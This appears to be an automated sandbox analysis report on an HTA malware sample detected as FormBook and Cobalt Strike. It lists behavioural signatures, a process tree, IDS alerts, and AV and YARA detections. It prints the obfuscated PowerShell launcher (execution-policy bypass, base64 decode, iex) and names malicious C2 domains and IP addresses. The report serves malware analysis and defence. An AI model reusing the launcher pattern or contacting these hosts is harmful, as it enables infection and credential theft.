Windows Analysis Report
clearpicturewithmebestthingsforgivenmebest.hta

Overview

General Information

Sample name: clearpicturewithmebestthingsforgivenmebest.hta
Analysis ID: 1640150
MD5: 572304f6b5fe3cb059e6bb7443d5341e
SHA1: 4e45a50877a83388c84364c2ceb969ce136dae4b
SHA256: 4962c3dba2f96f31a98e105eddc0e5e7a474a5368c6f851e86f91bf05654ab86
Tags: Formbook, hta, user-abuse_ch

Detection

Cobalt Strike, FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell decode and execute
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 8712 cmdline: mshta.exe "C:\Users\user\Desktop\clearpicturewithmebestthingsforgivenmebest.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 8768 cmdline: "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8812 cmdline: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 8932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 8948 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A73.tmp" "c:\Users\user\AppData\Local\Temp\fjq1drut\CSC5A43CF9668DC424F8B475C31EBB405.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • cosses.exe (PID: 9000 cmdline: "C:\Users\user\AppData\Roaming\cosses.exe" MD5: C338C9CDCCB21A6F023987865B4A6269)
          • svchost.exe (PID: 9036 cmdline: "C:\Users\user\AppData\Roaming\cosses.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • hudFv7yP8kEYIbmJoqYH.exe (PID: 1672 cmdline: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\js6QKahy.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • calc.exe (PID: 8452 cmdline: "C:\Windows\SysWOW64\calc.exe" MD5: 961E093BE1F666FD38602AD90A5F480F)
                • hudFv7yP8kEYIbmJoqYH.exe (PID: 6856 cmdline: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\5NAHkWkYd1Lwd.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
                • firefox.exe (PID: 8240 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further entries not shown)

Source | Rule | Description | Author | Strings
7.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
7.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
amsi32_8812.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |

System Summary

Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\5NAHkWkYd1Lwd.exe" , CommandLine: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\5NAHkWkYd1Lwd.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe, NewProcessName: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe, OriginalFileName: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe, ParentCommandLine: "C:\Windows\SysWOW64\calc.exe", ParentImage: C:\Windows\SysWOW64\calc.exe, ParentProcessId: 8452, ParentProcessName: calc.exe, ProcessCommandLine: "C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\5NAHkWkYd1Lwd.exe" , ProcessId: 6856, ProcessName: hudFv7yP8kEYIbmJoqYH.exe
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", ProcessId: 8932, ProcessName: csc.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8812, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Roaming\cosses.exe" , CommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , ParentImage: C:\Users\user\AppData\Roaming\cosses.exe, ParentProcessId: 9000, ParentProcessName: cosses.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , ProcessId: 9036, ProcessName: svchost.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8812, TargetFilename: C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))", CommandLine: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\AppData\Roaming\cosses.exe" , CommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , ParentImage: C:\Users\user\AppData\Roaming\cosses.exe, ParentProcessId: 9000, ParentProcessName: cosses.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cosses.exe" , ProcessId: 9036, ProcessName: svchost.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", ProcessId: 8932, ProcessName: csc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T01:18:58.608193+0100 | 2022050 | 1 | A Network Trojan was detected | 172.245.123.24 | 80 | 192.168.2.5 | 49717 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T01:18:58.699080+0100 | 2022051 | 1 | A Network Trojan was detected | 172.245.123.24 | 80 | 192.168.2.5 | 49717 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T01:19:39.176299+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 3.33.130.190 | 80 | TCP
2025-03-17T01:20:02.384367+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 13.248.169.48 | 80 | TCP
2025-03-17T01:20:16.862307+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49737 | 208.91.197.27 | 80 | TCP
2025-03-17T01:20:30.404146+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49741 | 209.74.77.230 | 80 | TCP
2025-03-17T01:20:43.712985+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49745 | 13.248.169.48 | 80 | TCP
2025-03-17T01:20:56.890380+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49749 | 3.33.130.190 | 80 | TCP
2025-03-17T01:21:10.041040+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49753 | 13.248.169.48 | 80 | TCP
2025-03-17T01:21:23.366793+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49757 | 92.204.40.98 | 80 | TCP
2025-03-17T01:21:37.871543+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49761 | 47.83.1.90 | 80 | TCP
2025-03-17T01:21:51.064071+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49765 | 13.248.243.5 | 80 | TCP
2025-03-17T01:22:04.483557+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49769 | 13.248.169.48 | 80 | TCP
2025-03-17T01:22:17.745205+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49773 | 162.255.118.68 | 80 | TCP
2025-03-17T01:22:31.289518+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49777 | 13.248.169.48 | 80 | TCP
2025-03-17T01:22:45.315215+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49781 | 37.27.60.109 | 80 | TCP
2025-03-17T01:22:58.499162+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49785 | 13.248.169.48 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T01:19:55.780889+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49730 | 13.248.169.48 | 80 | TCP
2025-03-17T01:19:57.293046+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49731 | 13.248.169.48 | 80 | TCP
2025-03-17T01:19:59.817895+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49732 | 13.248.169.48 | 80 | TCP
2025-03-17T01:20:08.174110+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49734 | 208.91.197.27 | 80 | TCP
2025-03-17T01:20:10.717629+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 208.91.197.27 | 80 | TCP
2025-03-17T01:20:13.267479+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49736 | 208.91.197.27 | 80 | TCP
2025-03-17T01:20:22.737861+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 209.74.77.230 | 80 | TCP
2025-03-17T01:20:25.308369+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49739 | 209.74.77.230 | 80 | TCP
2025-03-17T01:20:27.825947+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 209.74.77.230 | 80 | TCP
2025-03-17T01:20:35.935996+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49742 | 13.248.169.48 | 80 | TCP
2025-03-17T01:20:38.513525+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49743 | 13.248.169.48 | 80 | TCP
2025-03-17T01:20:41.160653+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49744 | 13.248.169.48 | 80 | TCP
2025-03-17T01:20:49.241256+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49746 | 3.33.130.190 | 80 | TCP
2025-03-17T01:20:51.765087+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49747 | 3.33.130.190 | 80 | TCP
2025-03-17T01:20:54.361436+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49748 | 3.33.130.190 | 80 | TCP
2025-03-17T01:21:03.452774+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49750 | 13.248.169.48 | 80 | TCP
2025-03-17T01:21:05.999709+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49751 | 13.248.169.48 | 80 | TCP
2025-03-17T01:21:07.492535+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49752 | 13.248.169.48 | 80 | TCP
2025-03-17T01:21:15.740835+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49754 | 92.204.40.98 | 80 | TCP
2025-03-17T01:21:18.267561+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49755 | 92.204.40.98 | 80 | TCP
2025-03-17T01:21:20.828379+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 92.204.40.98 | 80 | TCP
2025-03-17T01:21:29.952780+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49758 | 47.83.1.90 | 80 | TCP
2025-03-17T01:21:32.671635+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49759 | 47.83.1.90 | 80 | TCP
2025-03-17T01:21:35.265365+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49760 | 47.83.1.90 | 80 | TCP
2025-03-17T01:21:43.419139+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49762 | 13.248.243.5 | 80 | TCP
2025-03-17T01:21:45.983213+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49763 | 13.248.243.5 | 80 | TCP
2025-03-17T01:21:48.522856+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49764 | 13.248.243.5 | 80 | TCP
2025-03-17T01:21:56.844863+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49766 | 13.248.169.48 | 80 | TCP
2025-03-17T01:21:59.381251+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49767 | 13.248.169.48 | 80 | TCP
2025-03-17T01:22:01.924930+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49768 | 13.248.169.48 | 80 | TCP
2025-03-17T01:22:10.102153+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49770 | 162.255.118.68 | 80 | TCP
2025-03-17T01:22:12.664179+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49771 | 162.255.118.68 | 80 | TCP
2025-03-17T01:22:15.197186+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49772 | 162.255.118.68 | 80 | TCP
2025-03-17T01:22:23.642937+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49774 | 13.248.169.48 | 80 | TCP
2025-03-17T01:22:27.234100+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49775 | 13.248.169.48 | 80 | TCP
2025-03-17T01:22:28.743778+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49776 | 13.248.169.48 | 80 | TCP
2025-03-17T01:22:37.669328+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49778 | 37.27.60.109 | 80 | TCP
2025-03-17T01:22:40.206021+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49779 | 37.27.60.109 | 80 | TCP
2025-03-17T01:22:42.761578+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49780 | 37.27.60.109 | 80 | TCP
2025-03-17T01:22:50.824342+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49782 | 13.248.169.48 | 80 | TCP
2025-03-17T01:22:53.370592+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49783 | 13.248.169.48 | 80 | TCP
2025-03-17T01:22:55.925209+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49784 | 13.248.169.48 | 80 | TCP

AV Detection

Source: http://www.anartisthuman.info/q5nb/ | Avira URL Cloud: Label: malware
Source: http://www.anartisthuman.info/__media__/js/trademark.php?d=anartisthuman.info&type=ns | Avira URL Cloud: Label: malware
Source: http://www.Anartisthuman.info | Avira URL Cloud: Label: malware
Source: http://www.anartisthuman.info/__media__/design/underconstructionnotice.php?d=anartisthuman.info | Avira URL Cloud: Label: malware
Source: http://www.agistaking.xyz/c8u0/ | Avira URL Cloud: Label: malware
Source: http://www.agistaking.xyz/c8u0/?TXWhc2=FMJVgFO6r2fqsFEm0j1rtldefhT15/tuwnCszuFGPNY4Pf96ze7C0LpVaGXgsqc5GUWtyfXO8eoeNGfDqQZm9XVSjZoRocim5+cyYEf232QE43y67WXakMxM+EQzn5ZSpw==&p29L=vHcD5B0pXdrXi | Avira URL Cloud: Label: malware
Source: http://www.anartisthuman.info/q5nb/?TXWhc2=cbGNT1GwMlz4ZJSwsqDu/1ORw1S0MlT/otaQaC2lDUNXgkD5XcZBKJp94L4r/sunAAfx3aeZsm6/D88jzdrZZsCslV3Pj3aMzOE39ueOny0JikO66JbRLIFRZwNKddc1Fg==&p29L=vHcD5B0pXdrXi | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exe | ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Roaming\cosses.exe | ReversingLabs: Detection: 70%
Source: clearpicturewithmebestthingsforgivenmebest.hta | Virustotal: Detection: 40%
Source: clearpicturewithmebestthingsforgivenmebest.hta | ReversingLabs: Detection: 27%
Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3817513274.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1687168509.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3817630308.0000000002340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Binary string: calc.pdbGCTL source: svchost.exe, 00000007.00000003.1651170470.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1651036619.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: q8C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.pdb source: powershell.exe, 00000003.00000002.1482495416.0000000004B88000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: cosses.exe, 00000006.00000003.1469858707.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, cosses.exe, 00000006.00000003.1470158953.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1578771387.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1581466750.0000000003400000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.000000000540E000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1684130766.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.0000000005270000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1687074462.00000000050BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: calc.pdb source: svchost.exe, 00000007.00000003.1651170470.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1651036619.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C9000.00000004.00000020.00020000.00000000.sdmp
